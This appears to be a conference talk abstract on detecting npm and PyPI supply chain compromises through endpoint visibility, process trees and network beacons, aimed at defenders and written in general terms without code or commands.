For years, software supply chain security in ecosystems like npm and PyPI was treated as a "developer problem"- an issue delegated to posture management tools and policy enforcement. However, the threat landscape has fundamentally changed. Since 2025, we are no longer facing just simple credential stealers; we are witnessing massive, sophisticated campaigns involving destructive malware and self-replicating worms.
This shift is exacerbated by the explosion of "vibe coding" and AI-assisted development. As the definition of "developer" expands, more users are implementing code they do not fully understand, while attackers leverage AI to compromise packages or hallucinate new ones at scale.
In this session, we start by analyzing the anatomy of these modern compromises: how they happen and what they typically execute. Then, we strip away the abstraction. When a developer runs npm install or pip install, they aren't just downloading code; they are executing a process tree with the full privileges of that user.
We will demonstrate that visibility into the endpoint is the missing link in supply chain defense. By the time a malicious package is reported and removed from the public registry, it is often too late- the code has already run. We will expose the attacker’s playbook, dissecting notable campaigns to reveal their tradecraft. We will break down every step of the kill chain, mapping the attacks from the initial install command to the malicious child processes and network beacons.
Attendees will leave with more than just theory. The session concludes with practical hunting tips and specific query logic, empowering defenders to detect these anomalies in their own environments and spot the signs of a compromised supply chain before it spreads.